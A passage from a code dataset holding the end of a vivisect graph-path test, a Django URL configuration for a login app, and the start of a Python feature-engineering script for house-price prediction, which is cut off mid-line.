test_viv_graph_paths(self):\n # one file\n fname = 'testexe_amd64.exe'\n fva = 0x1400060ac\n cbva = 0x1400061bf\n vw = self.getAnsWorkspace(fname)\n\n self.checkGetCodePaths(vw, fva)\n self.checkGetCodePathsThru(vw, fva, cbva)\n self.checkGetCodePathsFrom(vw, fva, cbva)\n self.checkGetCodePathsTo(vw, fva, cbva)\n self.checkGetLoopPaths(vw, fva)\n self.checkGetLongPath(vw, fva)\n self.checkCoveragePaths(vw, fva)\n\n","repo_name":"bat-serjo/vivisect-py3","sub_path":"vivisect/tests/testvivgraph.py","file_name":"testvivgraph.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"15233174923","text":"from django.urls import path\nfrom App_Login import views\n\napp_name = 'App_Login'\n\nurlpatterns = [\n path('signup/', views.sign_up, name='signup'),\n path('login/', views.log_in, name='login'),\n path('logout/', views.logout_page, name='logout'),\n path('edit_profile/', views.edit_profile, name='edit_profile'),\n path('profile/', views.profile, name='profile'),\n path('user//', views.searching_user, name='searching_user'),\n path('follow/', views.follow, name='follow'),\n path('unfollow/', views.unfollow, name='unfollow'),\n]\n","repo_name":"Maloy-Baroi/PicBin","sub_path":"App_Login/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40149377990","text":"####################################################################################################################\r\n\r\nimport numpy as np \r\nimport pandas as pd \r\nimport xgboost as xgb\r\nfrom subprocess import check_output\r\nfrom sklearn.model_selection import cross_val_score, train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.linear_model import LinearRegression, RidgeCV, LassoCV, ElasticNetCV\r\nfrom sklearn.metrics import mean_squared_error, make_scorer\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\nfrom scipy.stats import skew\r\nfrom IPython.display import display\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.linear_model import Lasso\r\nfrom sklearn.metrics import mean_squared_error\r\ndef rmse(y_true, y_pred):\r\n return np.sqrt(mean_squared_error(y_true, y_pred))\r\n\r\n################################################### 读入数据 #############################################################\r\n\r\n\r\ntrain_data = pd.read_csv(\"../input/train.csv\")\r\ntest_data = pd.read_csv(\"../input/test.csv\")\r\n\r\n\r\n################################################### 特征补全 #############################################################\r\n\r\n# 补全LotFrontage\r\n# 通过计算其与LotArea的关系可以知道其有一定相关性,所以用边长补充,好像除以1.5就差不多了\r\n# (法一)缺失值用房屋边长补全\r\ntest_data['SqrtLotArea'] = np.sqrt(test_data['LotArea'])\r\ntrain_data['SqrtLotArea'] = np.sqrt(train_data['LotArea'])\r\ncond = test_data['LotFrontage'].isnull()\r\ntest_data.LotFrontage[cond] = test_data.SqrtLotArea[cond] \r\ndel test_data['SqrtLotArea']\r\ndel train_data['SqrtLotArea']\r\n# (法二)缺失值用中位数来补全\r\n# test_data.LotFrontage[cond] = test_data['LotFrontage'].median()\r\n# (法三)其实缺失值和log(LotArea)相关系数更高(还没有尝试)\r\n# (法四)用分组的中位数填充\r\ntmp = pd.DataFrame(index = train_data.index)\r\nlot_frontage_by_neighborhood = train_data['LotFrontage'].groupby(train_data['Neighborhood'])\r\ntmp['LotFrontage'] = train_data['LotFrontage']\r\ntmp['Neighborhood'] = train_data['Neighborhood']\r\nfor key, group in lot_frontage_by_neighborhood:\r\n idx = (tmp['Neighborhood'] == key) & (tmp['LotFrontage'].isnull())\r\n train_data.loc[idx, 'LotFrontage'] = group.median() \r\n\r\n# 补全MSZoning\r\n# 在test测试集中有缺失, train中没有\r\n# MSSubClass,MSZoning有一定关系\r\n# pd.crosstab(test_data.MSSubClass, test_data.MSZoning)\r\n# test_data中建筑类型缺失值补齐 30:RM 20:RL 70:RM\r\ntest_data.loc[test_data['MSSubClass'] == 20, 'MSZoning'] = 'RL'\r\ntest_data.loc[test_data['MSSubClass'] == 30, 'MSZoning'] = 'RM'\r\ntest_data.loc[test_data['MSSubClass'] == 70, 'MSZoning'] = 'RM'\r\n\r\n\r\n# 补全Exterior1st & Exterior2nd\r\n# 只在test中出现缺失值(nans only appear in test set)\r\n# 检查Exterior1st 和 Exterior2nd 是否存在缺失值共现的情况\r\n# 这里两个补全的值分别是选择了整体的众数和按年份分组的众数,可以调整\r\n#test_data.loc[test_data['Exterior1st'].isnull(), 'Exterior1st'] = 'VinylSd'\r\n#test_data.loc[test_data['Exterior2nd'].isnull(), 'Exterior2nd'] = 'VinylSd'\r\ntest_data.loc[test_data['Exterior1st'].isnull(), 'Exterior1st'] = 'Wd Sdng'\r\ntest_data.loc[test_data['Exterior2nd'].isnull(), 'Exterior2nd'] = 'Wd Sdng'\r\n\r\n\r\n# 补全KitchenQual\r\n# 只在测试集中有缺失值\r\ntest_data.loc[test_data['KitchenQual'].isnull(), 'KitchenQual'] = 'TA'\r\n\r\n# 补全Functional\r\n# 只在测试集中有缺失值\r\n# 填充一个最常见的值\r\ntest_data.loc[test_data['Functional'].isnull(), 'Functional'] = 'Typ'\r\n\r\n# 补全basement\r\nbasement_cols = ['BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2', 'BsmtFinSF1', 'BsmtFinSF2']\r\nfor cols in basement_cols:\r\n if 'FinFS' not in cols:#判断字段中是否包含'FinFS'\r\n train_data.loc[train_data[cols].isnull(), cols] = 'None'\r\nbasement_cols = ['Id', 'BsmtQual', 'BsmtCond', 'BsmtExposure', 'BsmtFinType1', 'BsmtFinType2']\r\n# 其中,有三行只有BsmtCond为NaN,该三行的其他列均有值 580 725 1064\r\ntest_data.loc[test_data['Id'] == 580, 'BsmtCond'] = 'TA'\r\ntest_data.loc[test_data['Id'] == 725, 'BsmtCond'] = 'TA'\r\ntest_data.loc[test_data['Id'] == 1064, 'BsmtCond'] = 'TA'\r\nfor cols in basement_cols:\r\n if cols not in 'SF' and cols not in 'Bath':\r\n test_data.loc[test_data['BsmtFinSF1'] == 0.0, cols] = 'None'\r\nfor cols in basement_cols:\r\n if test_data[cols].dtype == np.object:\r\n test_data.loc[test_data[cols].isnull(), cols] = 'None'\r\n else:\r\n test_data.loc[test_data[cols].isnull(), cols] = 0.0\r\n\r\n\r\n# 补全Garage 车库\r\ngarage_cols = ['GarageType', 'GarageQual', 'GarageCond', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea']\r\nfor cols in garage_cols:\r\n if train_data[cols].dtype == np.object:\r\n train_data.loc[train_data[cols].isnull(), cols] = 'None'\r\n else:\r\n train_data.loc[train_data[cols].isnull(), cols] = 0\r\n\r\ngarage_cols = ['GarageType', 'GarageQual', 'GarageCond', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea']\r\nfor cols in garage_cols:\r\n if test_data[cols].dtype == np.object:\r\n test_data.loc[test_data[cols].isnull(), cols] = 'None'\r\n else:\r\n test_data.loc[test_data[cols].isnull(), cols] = 0\r\ntest_data.loc[666, \"GarageQual\"] = \"TA\"\r\ntest_data.loc[666, \"GarageCond\"] = \"TA\"\r\ntest_data.loc[666, \"GarageFinish\"] = \"Unf\"\r\ntest_data.loc[666, \"GarageYrBlt\"] = \"1980\"\r\n\r\n# 补全SaleType\r\n# nans only appear in test set\r\ntest_data.loc[test_data['SaleType'].isnull(), 'SaleType'] = 'WD'\r\n\r\n# 补全Electrical\r\n# nans only appear in train set\r\ntrain_data.loc[train_data['Electrical'].isnull(), 'Electrical'] = 'SBrkr'\r\n\r\n\r\ntest_data.loc[test_data['MasVnrType'].isnull(), 'MasVnrType'] = 'None'\r\ntrain_data.loc[train_data['MasVnrType'].isnull(), 'MasVnrType'] = 'None'\r\ntest_data.loc[test_data['FireplaceQu'].isnull(), 'FireplaceQu'] = 'None'\r\ntrain_data.loc[train_data['FireplaceQu'].isnull(), 'FireplaceQu'] = 'None'\r\ntest_data.loc[test_data['Fence'].isnull(), 'Fence'] = 'None'\r\ntrain_data.loc[train_data['Fence'].isnull(), 'Fence'] = 'None'\r\ntest_data.loc[test_data['MiscFeature'].isnull(), 'MiscFeature'] = 'None'\r\ntrain_data.loc[train_data['MiscFeature'].isnull(), 'MiscFeature'] = 'None'\r\ntest_data.loc[test_data['MasVnrArea'].isnull(), 'MasVnrArea'] = 0.0\r\ntrain_data.loc[train_data['MasVnrArea'].isnull(), 'MasVnrArea'] = 0.0\r\ntest_data.loc[test_data['BsmtFinSF1'].isnull(), 'BsmtFinSF1'] = '0'\r\ntest_data.loc[test_data['BsmtFinSF2'].isnull(), 'BsmtFinSF2'] = '0'\r\ntest_data.loc[test_data['BsmtUnfSF'].isnull(), 'BsmtUnfSF'] = '0'\r\ntest_data.loc[test_data['TotalBsmtSF'].isnull(), 'TotalBsmtSF'] = '0'\r\ntest_data.loc[test_data['BsmtFullBath'].isnull(), 'BsmtFullBath'] = 0\r\ntest_data.loc[test_data['BsmtHalfBath'].isnull(), 'BsmtHalfBath'] = 0\r\n\r\n################################################### 特征转换 #############################################################\r\n\r\ntrain_data = train_data.replace({\"MSSubClass\": {20: \"A\", 30: \"B\", 40: \"C\", 45: \"D\", 50: \"E\",\r\n 60: \"F\", 70: \"G\", 75: \"H\", 80: \"I\", 85: \"J\",\r\n 90: \"K\", 120: \"L\", 150: \"M\", 160: \"N\", 180: \"O\", 190: \"P\"}})\r\ntest_data = test_data.replace({\"MSSubClass\": {20: \"A\", 30: \"B\", 40: \"C\", 45: \"D\", 50: \"E\",\r\n 60: \"F\", 70: \"G\", 75: \"H\", 80: \"I\", 85: \"J\",\r\n 90: \"K\", 120: \"L\", 150: \"M\", 160: \"N\", 180: \"O\", 190: \"P\"}})\r\n\r\n\r\ntrain_data = train_data.replace({\"Alley\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"BsmtCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"BsmtExposure\" : {\"No\" : 0, \"Mn\" : 1, \"Av\": 2, \"Gd\" : 3},\r\n \"BsmtFinType1\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtFinType2\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"ExterCond\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"ExterQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"FireplaceQu\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"Functional\" : {\"Sal\" : 1, \"Sev\" : 2, \"Maj2\" : 3, \"Maj1\" : 4, \"Mod\": 5, \r\n \"Min2\" : 6, \"Min1\" : 7, \"Typ\" : 8},\r\n \"GarageCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"GarageQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5, \"None\" : 0},\r\n \"HeatingQC\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"KitchenQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"LandSlope\" : {\"Sev\" : 1, \"Mod\" : 2, \"Gtl\" : 3},\r\n \"LotShape\" : {\"IR3\" : 1, \"IR2\" : 2, \"IR1\" : 3, \"Reg\" : 4},\r\n \"PavedDrive\" : {\"N\" : 0, \"P\" : 1, \"Y\" : 2},\r\n \"Street\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"Utilities\" : {\"ELO\" : 1, \"NoSeWa\" : 2, \"NoSewr\" : 3, \"AllPub\" : 4}}\r\n )\r\n\r\ntest_data = test_data.replace({\"Alley\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"BsmtCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"BsmtExposure\" : {\"No\" : 0, \"Mn\" : 1, \"Av\": 2, \"Gd\" : 3},\r\n \"BsmtFinType1\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtFinType2\" : {\"No\" : 0, \"Unf\" : 1, \"LwQ\": 2, \"Rec\" : 3, \"BLQ\" : 4, \r\n \"ALQ\" : 5, \"GLQ\" : 6},\r\n \"BsmtQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"ExterCond\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"ExterQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\": 3, \"Gd\": 4, \"Ex\" : 5},\r\n \"FireplaceQu\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"Functional\" : {\"Sal\" : 1, \"Sev\" : 2, \"Maj2\" : 3, \"Maj1\" : 4, \"Mod\": 5, \r\n \"Min2\" : 6, \"Min1\" : 7, \"Typ\" : 8},\r\n \"GarageCond\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"GarageQual\" : {\"No\" : 0, \"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5, \"None\" : 0},\r\n \"HeatingQC\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"KitchenQual\" : {\"Po\" : 1, \"Fa\" : 2, \"TA\" : 3, \"Gd\" : 4, \"Ex\" : 5},\r\n \"LandSlope\" : {\"Sev\" : 1, \"Mod\" : 2, \"Gtl\" : 3},\r\n \"LotShape\" : {\"IR3\" : 1, \"IR2\" : 2, \"IR1\" : 3, \"Reg\" : 4},\r\n \"PavedDrive\" : {\"N\" : 0, \"P\" : 1, \"Y\" : 2},\r\n \"Street\" : {\"Grvl\" : 1, \"Pave\" : 2},\r\n \"Utilities\" : {\"ELO\" : 1, \"NoSeWa\" : 2, \"NoSewr\" : 3, \"AllPub\" : 4}}\r\n )\r\n\r\n################################################### 统一两个数据的类型 #############################################################\r\n\r\n# 一部分是int64,一部分是float64\r\nc = ['BsmtFinSF1', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'BsmtFullBath', 'BsmtHalfBath', 'GarageCars', 'GarageArea']\r\nfor cols in c:\r\n tmp_col = test_data[cols].astype(pd.np.int64)\r\n tmp_col = pd.DataFrame({cols: tmp_col})\r\n del test_data[cols]\r\n test_data = pd.concat((test_data, tmp_col), axis=1) \r\n\r\n\r\n################################################### 新增特征 #############################################################\r\n\r\ntrain_data['1stFlr_2ndFlr_Sf'] = np.log1p(train_data['1stFlrSF'] + train_data['2ndFlrSF'])\r\ntest_data['1stFlr_2ndFlr_Sf'] = np.log1p(test_data['1stFlrSF'] + test_data['2ndFlrSF'])\r\n\r\ntrain_data['All_Liv_SF'] = np.log1p(train_data['1stFlr_2ndFlr_Sf'] + train_data['LowQualFinSF'] + train_data['GrLivArea'])\r\ntest_data['All_Liv_SF'] = np.log1p(test_data['1stFlr_2ndFlr_Sf'] + test_data['LowQualFinSF'] + test_data['GrLivArea'])\r\n\r\ntrain_data.drop(['1stFlrSF'], axis = 1)\r\ntest_data.drop(['1stFlrSF'], axis = 1)\r\ntrain_data.drop(['2ndFlrSF'], axis = 1)\r\ntest_data.drop(['2ndFlrSF'], axis = 1)\r\n\r\n\r\ntest_data[\"SaleCondition_PriceDown\"] = test_data.SaleCondition.replace(\r\n {'Abnorml': 1, 'Alloca': 1, 'AdjLand': 1, 'Family': 1, 'Normal': 0, 'Partial': 0})\r\n\r\ntrain_data[\"SaleCondition_PriceDown\"] = train_data.SaleCondition.replace(\r\n {'Abnorml': 1, 'Alloca': 1, 'AdjLand': 1, 'Family': 1, 'Normal': 0, 'Partial': 0})\r\n\r\n\r\ntrain_data['SimplOverallQual'] = train_data.OverallQual.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntrain_data['SimplOverallCond'] = train_data.OverallCond.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntrain_data['SimplPoolQC'] = train_data.PoolQC.replace({1 : 1, 2 : 1, # average\r\n 3 : 2, 4 : 2 # good\r\n })\r\ntrain_data['SimplGarageCond'] = train_data.GarageCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplGarageQual'] = train_data.GarageQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFireplaceQu'] = train_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFireplaceQu'] = train_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplFunctional'] = train_data.Functional.replace({1 : 1, 2 : 1, # bad\r\n 3 : 2, 4 : 2, # major\r\n 5 : 3, 6 : 3, 7 : 3, # minor\r\n 8 : 4 # typical\r\n })\r\ntrain_data['SimplKitchenQual'] = train_data.KitchenQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplHeatingQC'] = train_data.HeatingQC.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplBsmtFinType1'] = train_data.BsmtFinType1.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntrain_data['SimplBsmtFinType2'] = train_data.BsmtFinType2.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntrain_data['SimplBsmtCond'] = train_data.BsmtCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplBsmtQual'] = train_data.BsmtQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplExterCond'] = train_data.ExterCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntrain_data['SimplExterQual'] = train_data.ExterQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\n\r\n# 2* Combinations of existing features\r\n# Overall quality of the house\r\ntrain_data['OverallGrade'] = train_data['OverallQual'] * train_data['OverallCond']\r\n# Overall quality of the garage\r\ntrain_data['GarageGrade'] = train_data['GarageQual'] * train_data['GarageCond']\r\n# Overall quality of the exterior\r\ntrain_data['ExterGrade'] = train_data['ExterQual'] * train_data['ExterCond']\r\n# Overall kitchen score\r\ntrain_data['KitchenScore'] = train_data['KitchenAbvGr'] * train_data['KitchenQual']\r\n# Overall fireplace score\r\ntrain_data['FireplaceScore'] = train_data['Fireplaces'] * train_data['FireplaceQu']\r\n# Overall garage score\r\ntrain_data['GarageScore'] = train_data['GarageArea'] * train_data['GarageQual']\r\n# Overall pool score\r\ntrain_data['PoolScore'] = train_data['PoolArea'] * train_data['PoolQC']\r\n# Simplified overall quality of the house\r\ntrain_data['SimplOverallGrade'] = train_data['SimplOverallQual'] * train_data['SimplOverallCond']\r\n# Simplified overall quality of the exterior\r\ntrain_data['SimplExterGrade'] = train_data['SimplExterQual'] * train_data['SimplExterCond']\r\n# Simplified overall pool score\r\ntrain_data['SimplPoolScore'] = train_data['PoolArea'] * train_data['SimplPoolQC']\r\n# Simplified overall garage score\r\ntrain_data['SimplGarageScore'] = train_data['GarageArea'] * train_data['SimplGarageQual']\r\n# Simplified overall fireplace score\r\ntrain_data['SimplFireplaceScore'] = train_data['Fireplaces'] * train_data['SimplFireplaceQu']\r\n# Simplified overall kitchen score\r\ntrain_data['SimplKitchenScore'] = train_data['KitchenAbvGr'] * train_data['SimplKitchenQual']\r\n# Total number of bathrooms\r\ntrain_data['TotalBath'] = train_data['BsmtFullBath'] + (0.5 * train_data['BsmtHalfBath']) + \\\r\ntrain_data['FullBath'] + (0.5 * train_data['HalfBath'])\r\n# Total SF for house (incl. basement)\r\ntrain_data['AllSF'] = train_data['GrLivArea'] + train_data['TotalBsmtSF']\r\n# Total SF for 1st + 2nd floors\r\ntrain_data['AllFlrsSF'] = train_data['1stFlrSF'] + train_data['2ndFlrSF']\r\n# Total SF for porch\r\ntrain_data['AllPorchSF'] = train_data['OpenPorchSF'] + train_data['EnclosedPorch'] + \\\r\ntrain_data['3SsnPorch'] + train_data['ScreenPorch']\r\n# Has masonry veneer or not\r\ntrain_data['HasMasVnr'] = train_data.MasVnrType.replace({'BrkCmn' : 1, 'BrkFace' : 1, 'CBlock' : 1, \r\n 'Stone' : 1, 'None' : 0})\r\n# House completed before sale or not\r\ntrain_data['BoughtOffPlan'] = train_data.SaleCondition.replace({'Abnorml' : 0, 'Alloca' : 0, 'AdjLand' : 0, \r\n 'Family' : 0, 'Normal' : 0, 'Partial' : 1})\r\n\r\ntest_data['SimplOverallQual'] = test_data.OverallQual.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntest_data['SimplOverallCond'] = test_data.OverallCond.replace({1 : 1, 2 : 1, 3 : 1, # bad\r\n 4 : 2, 5 : 2, 6 : 2, # average\r\n 7 : 3, 8 : 3, 9 : 3, 10 : 3 # good\r\n })\r\ntest_data['SimplPoolQC'] = test_data.PoolQC.replace({1 : 1, 2 : 1, # average\r\n 3 : 2, 4 : 2 # good\r\n })\r\ntest_data['SimplGarageCond'] = test_data.GarageCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplGarageQual'] = test_data.GarageQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFireplaceQu'] = test_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFireplaceQu'] = test_data.FireplaceQu.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplFunctional'] = test_data.Functional.replace({1 : 1, 2 : 1, # bad\r\n 3 : 2, 4 : 2, # major\r\n 5 : 3, 6 : 3, 7 : 3, # minor\r\n 8 : 4 # typical\r\n })\r\ntest_data['SimplKitchenQual'] = test_data.KitchenQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplHeatingQC'] = test_data.HeatingQC.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplBsmtFinType1'] = test_data.BsmtFinType1.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntest_data['SimplBsmtFinType2'] = test_data.BsmtFinType2.replace({1 : 1, # unfinished\r\n 2 : 1, 3 : 1, # rec room\r\n 4 : 2, 5 : 2, 6 : 2 # living quarters\r\n })\r\ntest_data['SimplBsmtCond'] = test_data.BsmtCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplBsmtQual'] = test_data.BsmtQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplExterCond'] = test_data.ExterCond.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\ntest_data['SimplExterQual'] = test_data.ExterQual.replace({1 : 1, # bad\r\n 2 : 1, 3 : 1, # average\r\n 4 : 2, 5 : 2 # good\r\n })\r\n\r\n# 2* Combinations of existing features\r\n# Overall quality of the house\r\ntest_data['OverallGrade'] = test_data['OverallQual'] * test_data['OverallCond']\r\n# Overall quality of the garage\r\ntest_data['GarageGrade'] = test_data['GarageQual'] * test_data['GarageCond']\r\n# Overall quality of the exterior\r\ntest_data['ExterGrade'] = test_data['ExterQual'] * test_data['ExterCond']\r\n# Overall kitchen score\r\ntest_data['KitchenScore'] = test_data['KitchenAbvGr'] * test_data['KitchenQual']\r\n# Overall fireplace score\r\ntest_data['FireplaceScore'] = test_data['Fireplaces'] * test_data['FireplaceQu']\r\n# Overall garage score\r\ntest_data['GarageScore'] = test_data['GarageArea'] * test_data['GarageQual']\r\n# Overall pool score\r\ntest_data['PoolScore'] = test_data['PoolArea'] * test_data['PoolQC']\r\n# Simplified overall quality of the house\r\ntest_data['SimplOverallGrade'] = test_data['SimplOverallQual'] * test_data['SimplOverallCond']\r\n# Simplified overall quality of the exterior\r\ntest_data['SimplExterGrade'] = test_data['SimplExterQual'] * test_data['SimplExterCond']\r\n# Simplified overall pool score\r\ntest_data['SimplPoolScore'] = test_data['PoolArea'] * test_data['SimplPoolQC']\r\n# Simplified overall garage score\r\ntest_data['SimplGarageScore'] = test_data['GarageArea'] * test_data['SimplGarageQual']\r\n# Simplified overall fireplace score\r\ntest_data['SimplFireplaceScore'] = test_data['Fireplaces'] * test_data['SimplFireplaceQu']\r\n# Simplified overall kitchen score\r\ntest_data['SimplKitchenScore'] = test_data['KitchenAbvGr'] * test_data['SimplKitchenQual']\r\n# Total number of bathrooms\r\ntest_data['TotalBath'] = test_data['BsmtFullBath'] + (0.5 * test_data['BsmtHalfBath']) + \\\r\ntest_data['FullBath'] + (0.5 * test_data['HalfBath'])\r\n# Total SF for house (incl. basement)\r\ntest_data['AllSF'] = test_data['GrLivArea'] + test_data['TotalBsmtSF']\r\n# Total SF for 1st + 2nd floors\r\ntest_data['AllFlrsSF'] = test_data['1stFlrSF'] + test_data['2ndFlrSF']\r\n# Total SF for porch\r\ntest_data['AllPorchSF'] = test_data['OpenPorchSF'] + test_data['EnclosedPorch'] + \\\r\ntest_data['3SsnPorch'] + test_data['ScreenPorch']\r\n# Has masonry veneer or not\r\ntest_data['HasMasVnr'] = test_data.MasVnrType.replace({'BrkCmn' : 1, 'BrkFace' : 1, 'CBlock' : 1, \r\n 'Stone' : 1, 'None' : 0})\r\n# House completed before sale or not\r\ntest_data['BoughtOffPlan'] = test_data.SaleCondition.replace({'Abnorml' : 0, 'Alloca' : 0, 'AdjLand' : 0, \r\n 'Family' : 0, 'Normal' : 0, 'Partial' : 1})\r\ntrain_data['OverallQual-s2'] = train_data['OverallQual'] ** 2\r\ntrain_data['OverallQual-s3'] = train_data['OverallQual'] ** 3\r\ntrain_data['OverallQual-Sq'] = np.sqrt(train_data['OverallQual'])\r\ntrain_data['AllSF-2'] = train_data['AllSF'] ** 2\r\ntrain_data['AllSF-3'] = train_data['AllSF'] ** 3\r\ntrain_data['AllSF-Sq'] = np.sqrt(train_data['AllSF'])\r\ntrain_data['AllFlrsSF-2'] = train_data['AllFlrsSF'] ** 2\r\ntrain_data['AllFlrsSF-3'] = train_data['AllFlrsSF'] ** 3\r\ntrain_data['AllFlrsSF-Sq'] = np.sqrt(train_data['AllFlrsSF'])\r\ntrain_data['GrLivArea-2'] = train_data['GrLivArea'] ** 2\r\ntrain_data['GrLivArea-3'] = train_data['GrLivArea'] ** 3\r\ntrain_data['GrLivArea-Sq'] = np.sqrt(train_data['GrLivArea'])\r\ntrain_data['SimplOverallQual-s2'] = train_data['SimplOverallQual'] ** 2\r\ntrain_data['SimplOverallQual-s3'] = train_data['SimplOverallQual'] ** 3\r\ntrain_data['SimplOverallQual-Sq'] = np.sqrt(train_data['SimplOverallQual'])\r\ntrain_data['ExterQual-2'] = train_data['ExterQual'] ** 2\r\ntrain_data['ExterQual-3'] = train_data['ExterQual'] ** 3\r\ntrain_data['ExterQual-Sq'] = np.sqrt(train_data['ExterQual'])\r\ntrain_data['GarageCars-2'] = 